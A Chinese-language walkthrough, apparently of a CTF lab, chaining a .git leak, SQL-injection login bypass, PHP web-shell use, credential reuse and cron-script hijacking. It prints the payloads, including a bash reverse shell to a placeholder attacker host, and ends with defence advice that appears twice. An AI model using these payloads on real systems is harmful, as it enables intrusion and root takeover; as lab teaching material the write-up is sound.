Git泄露与Web渗透实战教学文档<\/h1>

1. Git泄露漏洞利用<\/h2>

1.1 漏洞发现<\/h3>

使用目录扫描工具（如dirsearch、gobuster）扫描Web目录<\/li>
常见泄露路径：\/.git\/<\/code>、\/.git\/config<\/code>、\/.git\/HEAD<\/code>等<\/li>

检测方法：返回200状态码或特定Git文件内容<\/li>
<\/ul>
1.2 利用工具<\/h3>
推荐使用Git_Extract工具（https:\/\/github.com\/gakki429\/Git_Extract）：<\/p>
python Git_Extract.py http:\/\/target.com\/.git\/
<\/span><\/span><\/code><\/pre>1.3 恢复Git仓库<\/h3>
工具会自动：<\/p>

下载.git目录中的所有对象<\/li>
重建Git仓库结构<\/li>
恢复源代码和历史提交记录<\/li>
<\/ol>
1.4 获取flag1<\/h3>

检查恢复的源代码中可能包含的敏感信息<\/li>
查看历史提交记录：git log<\/code><\/li>
检查所有文件内容：git show<\/code>或直接查看文件<\/li>
<\/ul>
2. 后台漏洞利用<\/h2>
2.1 万能密码登录<\/h3>

尝试常见SQL注入payload登录后台：
admin' or '1'='1'-- 
admin' or 1=1#
<\/code><\/pre>
<\/li>
即使功能有限，也要检查所有可见元素<\/li>
<\/ul>
2.2 文件路径发现<\/h3>

检查静态资源路径（如图片、CSS、JS）<\/li>
本例中通过头像路径发现同目录下的PHP文件<\/li>
尝试常见后门文件名：shell.php<\/code>、cmd.php<\/code>、backdoor.php<\/code>等<\/li>
<\/ul>
2.3 Web后门利用<\/h3>
发现后门参数为a<\/code>，但只支持GET请求：<\/p>
?<\/span>a<\/span>=<\/span>system<\/span>("whoami"<\/span>);
<\/span><\/span><\/code><\/pre>转换为POST请求方式：<\/p>
?<\/span>a<\/span>=<\/span>eval<\/span>($_POST[a<\/span>]);
<\/span><\/span><\/code><\/pre>然后可使用蚁剑等工具连接：<\/p>

连接URL：http:\/\/target.com\/path\/to\/shell.php<\/code><\/li>
密码：a<\/code><\/li>
<\/ul>
2.4 获取flag4<\/h3>

在后门提供的文件系统中搜索flag文件<\/li>
检查常见flag位置：\/var\/www\/html\/<\/code>、\/tmp\/<\/code>、\/home\/<\/code>等<\/li>
<\/ul>
3. 数据库提权与横向移动<\/h2>
3.1 数据库凭据获取<\/h3>

在Web应用配置文件中查找（config.php等）<\/li>
本例中在数据库中发现了ryan用户的密码<\/li>
<\/ul>
3.2 数据库连接方式<\/h3>

通过代理连接本地数据库：
proxychains mysql -u ryan -p -h localhost
<\/span><\/span><\/code><\/pre><\/li>
通过蚁剑的数据库连接功能<\/li>
<\/ol>
3.3 UDF提权尝试<\/h3>

尝试通过MySQL UDF函数提权<\/li>
常见问题：插件目录不可写或权限不足<\/li>
<\/ul>
3.4 用户切换<\/h3>
使用获取的密码切换到ryan用户：<\/p>
su ryan
<\/span><\/span><\/code><\/pre>注意<\/strong>：需要具有TTY的shell，推荐使用Venom等工具获取完整功能shell<\/p>
3.5 读取邮件获取flag3<\/h3>
Linux系统邮件通常存储在：<\/p>
\/var\/mail\/<username>
<\/span><\/span>cat \/var\/mail\/ryan
<\/span><\/span><\/code><\/pre>4. 定时任务提权<\/h2>
4.1 进程监控<\/h3>
上传并运行pspy64监控进程：<\/p>
.\/pspy64
<\/span><\/span><\/code><\/pre>发现root每3分钟执行del.py<\/code><\/p>
4.2 利用方法<\/h3>

修改del.py内容为反弹shell命令：
import<\/span> os
<\/span><\/span>os.<\/span>system("php \/tmp\/a.php"<\/span>)
<\/span><\/span><\/code><\/pre><\/li>
创建a.php反弹shell：
<?<\/span>php<\/span> 
<\/span><\/span>exec<\/span>("\/bin\/bash -c 'bash -i >& \/dev\/tcp\/attacker_ip\/port 0>&1'"<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre><\/li>
替代方法：

修改\/etc\/passwd添加root权限用户<\/li>
写入SSH公钥<\/li>
上线C2框架<\/li>
<\/ul>
<\/li>
<\/ol>
4.3 获取flag5<\/h3>

根据提示，flag5在root目录下的aim.jpg中<\/li>
提权后直接读取：
cat \/root\/aim.jpg
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
5. 关键工具与命令总结<\/h2>



工具\/命令<\/th>
用途<\/th>
<\/tr>
<\/thead>


Git_Extract<\/td>
恢复泄露的Git仓库<\/td>
<\/tr>

pspy64<\/td>
监控进程执行情况<\/td>
<\/tr>

Venom<\/td>
获取TTY shell<\/td>
<\/tr>

proxychains<\/td>
通过代理连接服务<\/td>
<\/tr>

mysql -u -p -h<\/td>
连接MySQL数据库<\/td>
<\/tr>

su<\/td>
切换用户<\/td>
<\/tr>
<\/tbody>
<\/table>
6. 防御建议<\/h2>


Git泄露防护<\/strong>：<\/p>

生产环境删除.git目录<\/li>
配置Web服务器禁止访问.git目录<\/li>
使用.gitignore文件排除敏感文件<\/li>
<\/ul>
<\/li>

后台安全<\/strong>：<\/p>

使用预编译语句防止SQL注入<\/li>
实施强密码策略<\/li>
限制后台访问IP<\/li>
<\/ul>
<\/li>

文件系统安全<\/strong>：<\/p>

定期检查Web目录下异常文件<\/li>
设置严格的文件权限<\/li>
禁用危险函数（如eval、system等）<\/li>
<\/ul>
<\/li>

系统安全<\/strong>：<\/p>

定期检查crontab任务<\/li>
监控\/var\/mail目录<\/li>
限制sudo权限和su命令使用<\/li>
<\/ul>
<\/li>

数据库安全<\/strong>：<\/p>

使用最小权限原则<\/li>
禁用FILE和EXECUTE权限<\/li>
定期审计数据库用户和权限<\/li>
<\/ul>
<\/li>
<\/ol>

工具\/命令<\/th>	用途<\/th> <\/tr> <\/thead>
Git_Extract<\/td>	恢复泄露的Git仓库<\/td> <\/tr>
pspy64<\/td>	监控进程执行情况<\/td> <\/tr>
Venom<\/td>	获取TTY shell<\/td> <\/tr>
proxychains<\/td>	通过代理连接服务<\/td> <\/tr>
mysql -u -p -h<\/td>	连接MySQL数据库<\/td> <\/tr>
su<\/td>	切换用户<\/td> <\/tr> <\/tbody> <\/table> 6. 防御建议<\/h2> Git泄露防护<\/strong>：<\/p> 生产环境删除.git目录<\/li> 配置Web服务器禁止访问.git目录<\/li> 使用.gitignore文件排除敏感文件<\/li> <\/ul> <\/li> 后台安全<\/strong>：<\/p> 使用预编译语句防止SQL注入<\/li> 实施强密码策略<\/li> 限制后台访问IP<\/li> <\/ul> <\/li> 文件系统安全<\/strong>：<\/p> 定期检查Web目录下异常文件<\/li> 设置严格的文件权限<\/li> 禁用危险函数（如eval、system等）<\/li> <\/ul> <\/li> 系统安全<\/strong>：<\/p> 定期检查crontab任务<\/li> 监控\/var\/mail目录<\/li> 限制sudo权限和su命令使用<\/li> <\/ul> <\/li> 数据库安全<\/strong>：<\/p> 使用最小权限原则<\/li> 禁用FILE和EXECUTE权限<\/li> 定期审计数据库用户和权限<\/li> <\/ul> <\/li> <\/ol>